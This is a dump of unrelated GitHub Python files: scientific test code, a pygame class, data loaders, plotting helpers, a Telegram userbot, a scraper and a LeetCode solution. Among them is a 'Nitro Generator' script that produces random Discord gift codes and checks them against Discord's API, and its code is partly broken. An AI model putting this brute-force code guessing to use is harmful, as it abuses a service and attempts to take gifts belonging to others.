\"f_tot\", \"f_vac\"]\n var_ch = [f\"{v}_{c.lower()}\" for v in var for c in ch]\n\n df_out_all = ld.read_df(create_out_all_file)\n df_mapp = ld.read_df(create_mapping_file)\n\n df = ld._make_cols_chan(df_out_all, df_mapp)\n\n for name in df.columns:\n if 
name.startswith(\"f_\"):\n assert name in var_ch\n\n\ndef test_make_df_ucid(rand_make_df):\n ucid = rand_make_df.ucid\n pos = rand_make_df.pos\n cellid = rand_make_df.cellID\n assert np.array_equal(ucid, pos * 100000000000 + cellid)\n\n\n# =============================================================================\n# test data integrity\n# =============================================================================\n\n\ndef test_make_df_values():\n p_out_all = os.path.join(base, \"samples_cellid\", \"Position01\", \"out_all\")\n df1 = ld.make_df(p_out_all)\n df1 = df1.drop([\"ucid\", \"pos\"], axis=1)\n df2 = pd.read_table(p_out_all)\n assert np.array_equal(df1.values, df2.values)\n\n\n@pt.mark.parametrize(\n \"string,expected\",\n [\n (\"BF_Position01_time01.tif.out.tif\", \"bf\"),\n (\"bF_Position01_t01.tif.out.tif\", \"bf\"),\n (\"bf_Position01_tiemp01.tif.out.tif\", \"bf\"),\n (\"dsf/BF_Position01_time01.tif.out.tif\", \"bf\"),\n (\"d34sf/BF_Position01_time01.tif.out.tif\", \"bf\"),\n (\"dsf/BF-Position01_time01.tif.out.tif\", \"bf\"),\n (\"d34sf/BF-Position01_time01.tif.out.tif\", \"bf\"),\n (\"RFP_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"RFP_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"RFp_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"dsf/RfP_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"d34sf/rFp_Position01_time01.tif.out.tif\", \"rfp\"),\n (\"dsf/YfP-Position01_time01.tif.out.tif\", \"yfp\"),\n (\"d34sf/YFP-Position01_time01.tif.out.tif\", \"yfp\"),\n ],\n)\ndef test_channels_rex(string, expected):\n assert ld.CHANNEL_REX.findall(string)[0][0].lower() == expected\n\n\n@pt.mark.parametrize(\n \"string,expected\",\n [\n (\"BF_Position1_t01.tif.out.tif\", [\"1\"]),\n (\"bF_Position01_time10.tif.out.tif\", [\"01\"]),\n (\"bf_P00001_time010.tif.out.tif\", [\"00001\"]),\n (\"dsf/position1e3_time01.tif.out.tif\", [\"1e3\"]),\n (\"d34sf/_Pos23e2+1.tif.out.tif\", [\"23e2+1\"]),\n (\"dsf/BF-Position23+12_time01.tif.out.tif\", [\"23\"]),\n (\"d34sf/BF-P01_time01.tif.out.tif\", [\"01\"]),\n (\"RFP_p01_time01.tif.out.tif\", [\"01\"]),\n (\"RFP/Pdasasfaf$sasd01_time01.tif.out.tif\", []),\n ],\n)\ndef test_position_rex(string, expected):\n assert ld.POSITION_REX.findall(string) == expected\n\n\n# =============================================================================\n# test: transpose tables and add fluorescence values\n# =============================================================================\n\n\ndef test_make_cols_cahnnels(create_out_all_file_min, create_mapping_file_min):\n \"\"\"\n Variables starting with f_ (f_vacuole) are disaggregated by channel\n f_vacuole_yfp f_vacuole_tfp f_vacuole_rfp f_vacuole_tfp f_vacuole_bf\n \"\"\"\n df_out_all = ld.read_df(create_out_all_file_min)\n df_mapp = ld.read_df(create_mapping_file_min)\n\n df_pycellid = ld._make_cols_chan(df_out_all, df_mapp)\n\n par = [np.nan if i % 2 == 0 else i * 50 for i in range(1, 11)]\n impar = [i * 50 if i % 2 == 0 else np.nan for i in range(1, 11)]\n\n df = pd.DataFrame(\n {\n \"area\": np.linspace(200, 1000, 10, dtype=int),\n \"f_nuc_bf\": par,\n \"f_nuc_yfp\": impar,\n \"f_tot_bf\": par,\n \"f_tot_yfp\": impar,\n \"f_vac_bf\": par,\n \"f_vac_yfp\": impar,\n \"flag\": [0 if i % 2 == 0 else 1 for i in range(1, 11)],\n \"cellID\": np.linspace(100, 400, 10, endpoint=True, dtype=int),\n \"ucid\": np.linspace(100, 400, 10, endpoint=True, dtype=int)\n + 100000000000,\n \"t_frame\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n \"pos\": np.ones(10, dtype=int),\n }\n )\n assert len(df_pycellid.columns) == 
len(df.columns)\n\n\n# =============================================================================\n# test merge table\n# =============================================================================\n\n\ndef test_merge_tables():\n # these are synthetic values ​​for test\n path = os.path.join(base, \"tests\", \"pydata\", \"test\")\n synthetic = ld.merge_tables(path=path).copy()\n\n ch_crtl = [\n \"f_tot_yfp\",\n \"f_tot_cfp\",\n \"f_tot_tfp\",\n \"f_local_bg_yfp\",\n \"f_local_bg_cfp\",\n \"f_local_bg_tfp\",\n \"f_nucl_yfp\",\n \"f_nucl_cfp\",\n \"f_nucl_tfp\",\n ]\n\n ucid_crtl = {\n 1100000000001,\n 1100000000002,\n 2200000000001,\n 2200000000002,\n 3300000000001,\n 3300000000002,\n }\n\n ch_var = []\n\n for name in synthetic.columns:\n assert \".\" not in name\n assert \" \" not in name[0]\n assert \" \" not in name[-1]\n if name.startswith(\"f_\"):\n ch_var.append(name)\n\n assert ch_var == ch_crtl\n assert set(synthetic[\"pos\"]) == {11, 22, 33}\n assert set(synthetic[\"ucid\"]) == ucid_crtl\n\n\n# =============================================================================\n# To build controls\n# =============================================================================\n\n# %%\n\n# Synthetic data for control.\n# Simulation: acquisition of 3 fluorescent channels, 4 time-lapse in 3\n# positions and measurement of 2 cells per image.\n# Minimum tree of files (metadata and measurements) returned by CellID.\n\n# rs = np.random.RandomState(np.random.MT19937(np.random.SeedSequence(1234)))\n\n# folder_test = os.path.join(base, \"tests\", \"pydata\", \"test\")\n# folder = [\"Pos0011\", \"Position02e1+2\", \"p33\"]\n# ch = [\"YFP\", \"CFP\", \"TFP\"]\n# m = []\n# oa = []\n# for f in folder:\n# path = os.path.join(folder_test, f)\n# os.mkdir(path)\n\n# img = [os.path.join(folder_test, f'{c}_{f}_time{t}.tif')\n# for c in ch for t in range(1,5)]\n\n# img_bf = [os.path.join(folder_test, f'BF_{f}_time{t}.tif')\n# for t in range(1,5)]\n\n# meta_data = pd.DataFrame(\n# {\n# 'fluor' : img,\n# 'flag' : np.repeat(np.linspace(0, 2, 3, dtype=int), 4),\n# 't.frame' : np.repeat(np.linspace(0, 2, 3, dtype=int), 4),\n# 'bright' : img_bf * 3,\n# 'bf.as.fl' : np.zeros(12, dtype=int),\n# }\n# )\n# meta_data.to_csv(\n# path_or_buf= os.path.join(folder_test, f, \"out_bf_fl_mapping\"),\n# sep=\"\\t\",\n# index=False,\n# )\n# m.append(meta_data)\n\n# df_crl = pd.DataFrame(\n# {\n# 'cellID ' : np.repeat(np.linspace(1, 2, 2, dtype=int), 12),\n# 't.frame' : list(np.repeat(np.linspace(0, 3, 4, dtype=int), 3))*2,\n# ' flag ' : [0,1,2] * 8,\n# ' f.tot ' : rs.rand(24),\n# ' f.local.bg ': rs.rand(24)*256,\n# ' f.nucl ': rs.rand(24)*256,\n# }\n# )\n# df_crl.to_csv(\n# path_or_buf= os.path.join(folder_test, f, \"out_all\"),\n# sep=\"\\t\",\n# index=False,\n# )\n# oa.append(df_crl)\n","repo_name":"pyCellID/pyCellID","sub_path":"tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":10624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"40683103401","text":"import pygame\r\nimport math\r\nfrom settings import *\r\nfrom map import walls_collision\r\nfrom Guns import Gun\r\n\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self, *groups, imr, iml, weapon, all_sprites, player_pos, collisions):\r\n super().__init__(*groups)\r\n\r\n self.fire = False\r\n self.x, self.y = player_pos\r\n self.angle = player_angle\r\n self.lives = player_lives\r\n self.m_lives = player_lives\r\n\r\n # animation\r\n self.animation = {}\r\n for step, 
anim in enumerate(imr[:]):\r\n self.animation['r_' + str(step)] = \\\r\n pygame.transform.scale(anim,\r\n (anim.get_width() * 80 // TILE, anim.get_height() * 80 // TILE))\r\n for step, anim in enumerate(iml[:]):\r\n self.animation['l_' + str(step)] = \\\r\n pygame.transform.scale(anim,\r\n (anim.get_width() * 80 // TILE, anim.get_height() * 80 // TILE))\r\n\r\n self.anim_step = 0\r\n self.anim_turn = 'r_'\r\n self.max_steps = len(imr) // 2 * player_speed\r\n\r\n # rect and im\r\n self.image = pygame.transform.scale(imr[0],\r\n (imr[0].get_width() * 80 // TILE, imr[0].get_height() * 80 // TILE))\r\n self.rect = pygame.rect.Rect(self.x, self.y, self.image.get_width(), self.image.get_height() // 2)\r\n self.rect.center = player_pos\r\n\r\n # rect for world collision\r\n self.w_rect = pygame.rect.Rect(self.x, self.y, self.image.get_width(), self.image.get_height() // 2)\r\n self.w_rect.center = player_pos\r\n\r\n walls_collision.append(self.w_rect)\r\n\r\n self.all_sprites = all_sprites\r\n self.weapon = Gun(weapon[0], weapon[1], all_sprites, player=self)\r\n\r\n @property\r\n def pos(self):\r\n return (self.x, self.y)\r\n\r\n @property\r\n def bullet_name(self):\r\n return 'bullet.png'\r\n\r\n @property\r\n def turn(self):\r\n return 'player'\r\n\r\n def is_empty(self, dx, dy):\r\n next_rect = self.w_rect.move(dx, dy)\r\n hit_indexes = next_rect.collidelistall(walls_collision)\r\n\r\n if len(hit_indexes) > 1:\r\n delta_x, delta_y = 0, 0\r\n for hit_index in hit_indexes:\r\n hit_rect = walls_collision[hit_index]\r\n if hit_rect != self.w_rect:\r\n if dx > 0:\r\n delta_x += next_rect.right - hit_rect.left\r\n else:\r\n delta_x += hit_rect.right - next_rect.left\r\n if dy > 0:\r\n delta_y += next_rect.bottom - hit_rect.top\r\n else:\r\n delta_y += hit_rect.bottom - next_rect.top\r\n\r\n if abs(delta_x - delta_y) < 10:\r\n dx, dy = 0, 0\r\n elif delta_x > delta_y:\r\n dy = 0\r\n elif delta_y > delta_x:\r\n dx = 0\r\n self.rect.x += dx\r\n self.rect.y += dy\r\n self.x += dx\r\n self.y += dy\r\n\r\n def movement(self):\r\n keys = pygame.key.get_pressed()\r\n step = self.anim_step\r\n if keys[pygame.K_w]:\r\n self.is_empty(0, -player_speed)\r\n step += 1\r\n if keys[pygame.K_s]:\r\n self.is_empty(0, player_speed)\r\n step += 1\r\n if keys[pygame.K_a]:\r\n self.is_empty(-player_speed, 0)\r\n step += 1\r\n if keys[pygame.K_d]:\r\n self.is_empty(player_speed, 0)\r\n step += 1\r\n\r\n self.w_rect.center = self.x, self.y\r\n\r\n if step != self.anim_step:\r\n self.anim_step = self.anim_step + 1\r\n else:\r\n self.anim_step = 0\r\n\r\n self.do_animation()\r\n \r\n if pygame.mouse.get_focused():\r\n x2, y2 = pygame.mouse.get_pos()\r\n x1, y1 = self.rect.x, self.rect.y\r\n h = y2 - y1\r\n w = x2 - x1\r\n t = math.atan2(h, w)\r\n self.angle = t\r\n if x2 <= HALF_WIDTH:\r\n self.anim_turn = 'l_'\r\n else:\r\n self.anim_turn = 'r_'\r\n\r\n def do_animation(self):\r\n self.image = self.animation[self.anim_turn + str(self.anim_step // 10)]\r\n if self.anim_step // 10 == self.max_steps:\r\n self.anim_step = 0\r\n\r\n def move(self, dx, dy):\r\n self.rect.x += dx\r\n self.rect.y += dy\r\n\r\n def start_fire(self):\r\n self.fire = True\r\n\r\n def stop_fire(self):\r\n self.fire = False\r\n\r\n def hit(self, *args, **kwarks):\r\n if args[0] == 'monster':\r\n self.lives -= args[1]\r\n if not self.is_live:\r\n self.dead()\r\n return True\r\n return False\r\n\r\n def dead(self):\r\n pass\r\n\r\n @property\r\n def is_live(self):\r\n if self.lives > 0:\r\n return True\r\n return False\r\n\r\n def update(self):\r\n 
self.movement()\r\n if self.fire:\r\n self.weapon.fire()\r\n\r\n def get_weapon(self, weapon):\r\n self.weapon = weapon\r\n","repo_name":"IAmJustFish/Dungeons","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"27871443000","text":"from collections import defaultdict\nfrom os.path import join\n\nfrom core.conf import conf\nfrom core.storage.main import storage\nfrom libs.utils.io import write\n\n\ndef update_langs():\n all_articles = defaultdict(list)\n without_redirects = defaultdict(list)\n # for title, page in storage.iterate_pages_with_info(silent=True):\n for title, page in storage.iterate_pages(silent=True):\n for lang in page.languages.keys:\n all_articles[lang].append(title)\n # if not page.is_redirect:\n if title not in storage.redirects_set:\n without_redirects[lang].append(title)\n\n path = join(conf.PARSED_STORAGE_PATH, 'lists', 'langs')\n for lang, titles in all_articles.items():\n write(f'{path}/{lang or \"-\"}.txt', '\\n'.join(titles))\n\n path = join(conf.PARSED_STORAGE_PATH, 'lists', 'langs', 'articles')\n for lang, titles in without_redirects.items():\n write(f'{path}/{lang or \"-\"}.txt', '\\n'.join(titles))\n\n print('ok')\n\n\nif __name__ == '__main__':\n update_langs()\n","repo_name":"2vitalik/wiktionary","sub_path":"projects/parsed/update_lists/update_langs.py","file_name":"update_langs.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"33"} +{"seq_id":"23478336922","text":"import sys\nimport config\nimport pyrogram\n\nfrom lolithabot import log\n\nclients = []\nassistant = []\n\nclass lolithaUserbot(pyrogram.Client):\n def __init__(self):\n ubot = self.__class__.__name__.lower()\n self.one = pyrogram.Client(\n name=ubot,\n api_id=config.API_ID,\n api_hash=config.API_HASH,\n session_string=config.SessionString,\n no_updates=True\n )\n self.second = pyrogram.Client(\n name=ubot,\n api_id=config.API_ID,\n api_hash=config.API_HASH,\n session_string=config.SessionString2,\n no_updates=True\n )\n\n async def start(self):\n log.info('Starting lolitha userbot...')\n if config.SessionString:\n await self.one.start()\n clients.append(1)\n try:\n await self.one.send_message(\n chat_id=config.log_chat,\n text=(\"✅ Assistant has been started.\")\n )\n except:\n log.error(\n \"Assistant account has failed to acces the log group.\"\n )\n sys.exit()\n \n client_id = (await self.one.get_me()).id\n assistant.append(client_id)\n log.info(\"lolitha userbot 1 has been started.\")\n\n if config.SessionString2:\n await self.second.start()\n clients.append(2)\n try:\n await self.second.send_message(\n chat_id=config.log_chat,\n text=\"✅ Assistant has been started.\" \n )\n except:\n log.error(\n \"Assistant 2 account has failed to acces the log group.\"\n )\n sys.exit()\n\n client_id = (await self.second.get_me()).id\n assistant.append(client_id)\n log.info(\"lolitha userbot 2 has been started.\") \n","repo_name":"mukeshmoni/lolita","sub_path":"lolita/lolita_client.py","file_name":"lolita_client.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20311155131","text":"import numpy as np\nimport scipy.io\nfrom torch.utils.data import Dataset\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nimport math\n\n\nclass Multi_view_data(Dataset):\n 
\"\"\"\n load multi-view data\n \"\"\"\n\n def __init__(self, root, train=True, Normal=1):\n \"\"\"\n :param root: data name and path\n :param train: load training set or test set\n :param noise: noise level in test set\n \"\"\"\n super(Multi_view_data, self).__init__()\n self.root = root\n self.train = train\n self.data_path = self.root + '.mat'\n self.data = scipy.io.loadmat(self.data_path)\n self.view_number = self.data['X'].shape[1]\n self.feature_per_view = []\n ratio = 0.8\n \n X = np.split(self.data['X'], self.view_number, axis=1)\n X_train = []\n X_test = []\n labels_train = []\n labels_test = []\n \n self.X_train_mean = {}\n self.X_train_std = {}\n \n if min(self.data['gt']) == 0:\n labels = self.data['gt'] + 1\n else:\n labels = self.data['gt']\n labels = self.data['gt']\n classes = max(labels)[0]+1\n self.classes = max(labels)[0]+1\n \n all_length = 0\n for c_num in range(classes):\n c_length = np.sum(labels == c_num)\n index = np.arange(c_length)\n #shuffle(index)\n labels_train.extend(labels[all_length + index][0:math.floor(c_length * ratio)])\n labels_test.extend(labels[all_length + index][math.floor(c_length * ratio):])\n X_train_temp = []\n X_test_temp = []\n for v_num in range(self.view_number):\n X_train_temp.append(X[v_num][0][0].transpose()[all_length + index][0:math.floor(c_length * ratio)])\n X_test_temp.append(X[v_num][0][0].transpose()[all_length + index][math.floor(c_length * ratio):])\n if c_num == 0:\n X_train = X_train_temp;\n X_test = X_test_temp\n else:\n for v_num in range(self.view_number):\n X_train[v_num] = np.r_[X_train[v_num], X_train_temp[v_num]]\n X_test[v_num] = np.r_[X_test[v_num], X_test_temp[v_num]]\n all_length = all_length + c_length\n if (Normal == 1):\n sign = 0\n if self.root.endswith(\"animal\"):\n sign = 1\n if self.root.endswith(\"yaleB\"):\n sign = 2\n if self.root.endswith(\"nyud2\"):\n sign = 2\n for v_num in range(self.view_number):\n X_train[v_num] = Normalize(X_train[v_num], sign)\n X_test[v_num] = Normalize(X_test[v_num], sign)\n \n \n \n if self.train:\n self.X = X_train\n self.y = labels_train\n else:\n self.X = X_test\n self.y = labels_test\n \n for v in range(self.view_number):\n self.feature_per_view.append(self.X[v].shape[1])\n \n \n\n def __getitem__(self, index):\n data = dict()\n d = []\n for v_num in range(len(self.X)):\n data[v_num] = (self.X[v_num][index]).astype(np.float32)\n d.append((self.X[v_num][index]).astype(np.float32))\n target = self.y[index]\n batch_size = len(target)\n view_num = len(self.X)\n \n full_data = np.concatenate(d, axis=0)\n target = target.squeeze()\n \n return full_data, target\n\n def __len__(self):\n return len(self.X[0])\n\n\ndef Normalize(x, min=0):\n if min == 0:\n #scaler = StandardScaler(with_mean=False,with_std=False)\n scaler = StandardScaler()\n elif min ==1:\n scaler = StandardScaler(with_mean=False,with_std=False)\n elif min ==2:\n scaler = StandardScaler(with_mean=False)\n else:\n print('error')\n exit()\n \n norm_x = scaler.fit_transform(x)\n \n return norm_x","repo_name":"QingyangZhang/CML","sub_path":"miwae/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"33"} +{"seq_id":"24714666302","text":"from pathlib import Path\nfrom typing import Union, Optional\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker\nimport numpy as np\nfrom matplotlib.image import AxesImage\nfrom numpy import ma\n\nfrom hima.common.utils import 
ensure_list, safe_ith\nfrom hima.envs.biogwlab.move_dynamics import DIRECTIONS_ORDER\n\n\ndef plot_grid_images(\n images: Union[np.ndarray, list[np.ndarray]],\n titles: Union[str, list[str]] = None,\n show: bool = True,\n save_path: Optional[Path] = None,\n with_value_text_flags: list[bool] = None,\n cols_per_row: int = 5\n):\n images = ensure_list(images)\n titles = ensure_list(titles)\n n_images = len(images)\n\n n_rows = (n_images - 1) // cols_per_row + 1\n n_cols = min(n_images, cols_per_row)\n\n fig, axes = plt.subplots(\n n_rows, n_cols,\n figsize=(5 * n_cols, 5 * n_rows)\n )\n if n_images == 1:\n axes = [axes]\n\n for i in range(n_images):\n ax = axes[i] if n_images <= cols_per_row else axes[i//cols_per_row][i%cols_per_row]\n img = images[i]\n title = safe_ith(titles, i)\n with_value_text = safe_ith(with_value_text_flags, i)\n _plot_grid_image(ax, img, title=title, with_value_text=with_value_text)\n\n fig.tight_layout()\n\n if show:\n plt.show()\n\n if save_path is not None:\n fig.savefig(save_path, dpi=120)\n plt.close('all')\n\n\ndef store_environment_map(\n map_ind: int, env_map: Union[np.ndarray, list[np.ndarray]],\n env_name: str, env_seed: int, test_dir: Path\n):\n env_map = ensure_list(env_map)\n titles = [f'{env_name}, seed={env_seed}']\n if len(env_map) > 1:\n titles.append('agent observation')\n\n save_path = test_dir.joinpath(f'map_{env_name}_{map_ind}_{env_seed}.svg')\n plot_grid_images(env_map, titles, show=False, save_path=save_path)\n\n\ndef plot_regular_plot(ax, data: np.ndarray):\n ax.plot(np.arange(data.size), data)\n\n\ndef _plot_grid_image(\n ax, data: np.ndarray, title: Optional[str] = None,\n with_value_text: bool = False\n):\n if title is not None:\n ax.set_title(title)\n ax.xaxis.tick_top()\n\n if data.ndim == 3 and data.shape[2] == 4:\n plot_triangled(ax, data)\n return\n if data.ndim == 1:\n plot_regular_plot(ax, data)\n return\n\n h, w = data.shape[:2]\n # labels: major\n ax.set_xticks(np.arange(w + 1))\n ax.set_yticks(np.arange(h + 1))\n ax.set_xticklabels(np.arange(w+1))\n ax.set_yticklabels(np.arange(h+1))\n # grid: minor\n ax.set_xticks(np.arange(w + 1) - .5, minor=True)\n ax.set_yticks(np.arange(h + 1) - .5, minor=True)\n ax.grid(which=\"minor\", color='grey', linestyle='-', linewidth=.5)\n\n threshold = .03 if data.dtype == float else 2\n im = ax.imshow(\n data,\n norm=mpl.colors.SymLogNorm(linthresh=threshold, base=10)\n )\n if with_value_text and h * w <= 200:\n valfmt = '{x:.1f}' if data.dtype == float else '{x}'\n annotate_heatmap(im, data=data, valfmt=valfmt)\n\n\ndef plot_triangled(ax, data: np.ndarray):\n h, w = data.shape[:2]\n x = np.linspace(0, w, 2 * w + 1) - .5\n y = np.linspace(0, h, 2 * h + 1) - .5\n # noinspection PyTypeChecker\n points: tuple[np.ndarray, np.ndarray] = np.meshgrid(x, y)\n pxs, pys = points[0].ravel(), points[1].ravel()\n\n x_data, y_data = [], []\n for y_shit in range(h):\n for x_shift in range(w):\n up_x = 0, 1, 2\n up_y = 0, 1, 0\n\n down_x = 0, 1, 2\n down_y = 2, 1, 2\n\n left_x = 0, 1, 0\n left_y = 0, 1, 2\n\n right_x = 2, 1, 2\n right_y = 0, 1, 2\n\n assert DIRECTIONS_ORDER[0] == 'right'\n ixs = np.vstack((right_x, down_x, left_x, up_x)) + 2 * x_shift\n iys = np.vstack((right_y, down_y, left_y, up_y)) + 2 * y_shit\n x_data.append(ixs)\n y_data.append(iys)\n\n ixs = np.vstack(x_data)\n iys = np.vstack(y_data)\n ips = np.ravel_multi_index([iys, ixs], dims=points[0].shape)\n\n # labels: major\n ax.set_xticks(np.arange(w + 1))\n ax.set_yticks(np.arange(h + 1))\n ax.set_xticklabels(np.arange(w+1))\n 
ax.set_yticklabels(np.arange(h+1))\n # ax.grid(color='grey', linestyle='-', linewidth=2.)\n # grid: minor\n ax.set_xticks(np.arange(w + 1) - .5, minor=True)\n ax.set_yticks(np.arange(h + 1) - .5, minor=True)\n ax.grid(which=\"minor\", color='grey', linestyle='-', linewidth=.5)\n ax.margins(x=0, y=0)\n ax.tripcolor(pxs, pys, ips, data.ravel())\n ax.invert_yaxis()\n\n\ndef annotate_heatmap(\n im: AxesImage, data: np.ndarray = None, valfmt=\"{x:.2f}\",\n textcolors=(\"white\", \"black\"), threshold=None, **textkw\n):\n \"\"\"\n A function to annotate a heatmap.\n\n Parameters\n ----------\n im\n The AxesImage to be labeled.\n data\n Data used to annotate. If None, the image's data is used. Optional.\n valfmt\n The format of the annotations inside the heatmap. This should either\n use the string format method, e.g. \"$ {x:.2f}\", or be a\n `matplotlib.ticker.Formatter`. Optional.\n textcolors\n A pair of colors. The first is used for values below a threshold,\n the second for those above. Optional.\n threshold\n Value in data units according to which the colors from textcolors are\n applied. If None (the default) uses the middle of the colormap as\n separation. Optional.\n **kwargs\n All other arguments are forwarded to each call to `text` used to create\n the text labels.\n \"\"\"\n\n if not isinstance(data, (list, np.ndarray)):\n data = im.get_array()\n\n # Normalize the threshold to the images color range.\n if threshold is not None:\n threshold = im.norm(threshold)\n else:\n threshold = im.norm(data.max())/2.\n\n # Set default alignment to center, but allow it to be overwritten by textkw.\n kw = dict(horizontalalignment=\"center\", verticalalignment=\"center\")\n kw.update(textkw)\n\n # Get the formatter in case a string is supplied\n if isinstance(valfmt, str):\n valfmt = mpl.ticker.StrMethodFormatter(valfmt)\n\n # Loop over the data and create a `Text` for each \"pixel\".\n # Change the text's color depending on the data.\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n if isinstance(data, ma.MaskedArray) and data.mask[i, j]:\n continue\n over_threshold = im.norm(data[i, j]) > threshold\n kw.update(color=textcolors[int(over_threshold)])\n im.axes.text(j, i, valfmt(data[i, j], None), **kw)\n\n\ndef transform_fig_to_image(fig):\n fig.canvas.draw()\n img = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n return img\n","repo_name":"AIRI-Institute/him-agent","sub_path":"hima/common/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":6836,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"33"} +{"seq_id":"5029488229","text":"to_decipher = [ch for ch in input()]\n\ncommand = ''\n\nwhile command != 'Abracadabra':\n command = input()\n if command == 'Abracadabra':\n continue\n if 'Abjuration' in command:\n for idx, chr in enumerate(to_decipher):\n to_decipher[idx] = chr.upper()\n print(''.join(to_decipher))\n elif 'Necromancy' in command:\n for idx, chrr in enumerate(to_decipher):\n to_decipher[idx] = chrr.lower()\n print(''.join(to_decipher))\n elif 'Illusion' in command:\n command, index, letter = command.split()\n if int(index) > len(to_decipher) - 1 or int(index) < 0:\n print(\"The spell was too weak.\")\n else:\n to_decipher[int(index)] = letter\n print(\"Done!\")\n elif 'Divination' in command:\n command, first_sub, second_sub = command.split()\n joined_string = ''.join(to_decipher)\n if first_sub not in joined_string:\n 
continue\n else:\n new_string = joined_string.replace(first_sub, second_sub)\n to_decipher = [chr_ for chr_ in new_string]\n print(''.join(to_decipher))\n elif 'Alteration' in command:\n command, sub_string = command.split()\n joined_string = ''.join(to_decipher)\n if sub_string not in joined_string:\n print(\"The spell did not work!\")\n else:\n new_string = joined_string.replace(sub_string, '')\n to_decipher = [char for char in new_string]\n print(''.join(to_decipher))\n else:\n print(\"The spell did not work!\")\n","repo_name":"tsvtln/SoftUniFundamentals","sub_path":"final_exam/01_task.py","file_name":"01_task.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"5547563495","text":"import os\nimport requests\nimport json\n\n\napi_key = os.environ['API_KEY']\napi_path = 'https://codeplexarchive-search.search.windows.net/indexes/codeplexarchive-index/docs'\ntop = 10000000\n\nparams = {\n 'api-version': '2016-09-01',\n 'api-key': api_key,\n '$top': top,\n 'highlight': 'Title',\n 'search': '*'\n}\nnext_link = ''\nprojects = []\n\nwhile True:\n try:\n if not next_link:\n response = requests.get(api_path, params=params)\n else:\n response = requests.get(next_link)\n \n response_json = response.json()\n\n results = response_json['value']\n for project in results:\n print(project['ProjectName'])\n projects.append(project)\n\n next_link = response_json['@odata.nextLink']\n\n except Exception as e:\n print(e, \"- I guess we're done for now.\")\n with open('projects.json', 'w') as projects_file:\n json.dump(projects, projects_file)\n break","repo_name":"zaafonin/CodeplexScraper","sub_path":"retrieve_list.py","file_name":"retrieve_list.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"21711598643","text":"import random, string\r\nimport requests\r\nimport os\r\nfrom colorama import Fore\r\n\r\n\r\n\r\n\r\n\r\n(\"[!]nitro - https://discord.nitro/gifted/valid\")\r\n\r\n\r\n\r\n\r\n\r\nfrom time import sleep\r\nimport sys\r\n\r\nline_1 = \"[#]Discord Nitro Generator by Hackage\"\r\nfor x in line_1:\r\n print(x, end='')\r\n sys.stdout.flush()\r\n sleep(0.1)\r\n\r\nnum = input(f' [?] Amount of discord nitro:')\r\n\r\nf = open(\"codes.txt\", \"a+\", encoding='utf-8')\r\n\r\nprint(\"\")\r\n\r\nfor n in range(int(num)):\r\n y = ''.join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(16))\r\n f.write('https://discord.gift/')\r\n f.write(y)\r\n f.write(\"\\n\")\r\n\r\nf.close()\r\n\r\nprint(f\"{Fore.LIGHTYELLOW_EX}[>] Generated {num} nitro codes and saved \\n[^]now going to check {num} nitro codes are valid or not! 
\")\r\n\r\nwith open(\"codes.txt\") as f:\r\n for line in f:\r\n nitro = line.strip(\"\\n\")\r\n\r\n url = \"https://discordapp.com/api/v6/entitlements/gift-codes/\" + nitro + \"?with_application=false&with_subscription_plan=true\"\r\n\r\n r = requests.get(url)\r\n\r\n if r.status_code == 200:\r\n print(\"{Fore.RED}wow\")\r\n print(\"[+]VALID CODE ┇ {} \".format(line.strip(\"\\n\")))\r\n else:\r\n print(\"[-]INVALID CODE ┇ {} \".format(line.strip(\"\\n\")))\r\n\r\nos.remove(\"Generatednitro.txt\")\r\n\r\nprint(f\"{Fore.LIGHTYELLOW_EX}\\nbye bye :) please give me a star \\n\")\r\n","repo_name":"HackageModz/Nitro-Generator","sub_path":"NITRO GENERATOR.py","file_name":"NITRO GENERATOR.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"3178770916","text":"# https://leetcode-cn.com/problems/remove-duplicates-from-sorted-list-ii/\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n#快指针和慢指针\nclass Solution:\n def deleteDuplicates(self, head: ListNode) -> ListNode:\n if not head or not head.next:\n return head\n newhead = ListNode(-10000, head)\n slow = newhead\n while slow and slow.next:\n fast = slow.next\n while fast.next and fast.next.val == fast.val:\n fast = fast.next\n if fast != slow.next:\n slow.next = fast.next\n else:\n slow = slow.next\n return newhead.next\n\n\na = ListNode(1)\nb = ListNode(2)\nc = ListNode(3)\nd = ListNode(3)\ne = ListNode(4)\nf = ListNode(4)\ng = ListNode(5)\na.next = b\nb.next = c\nc.next = d\nd.next = e\ne.next = f\nf.next = g\nhead = Solution().deleteDuplicates(a)\nwhile head:\n print(head.val)\n head = 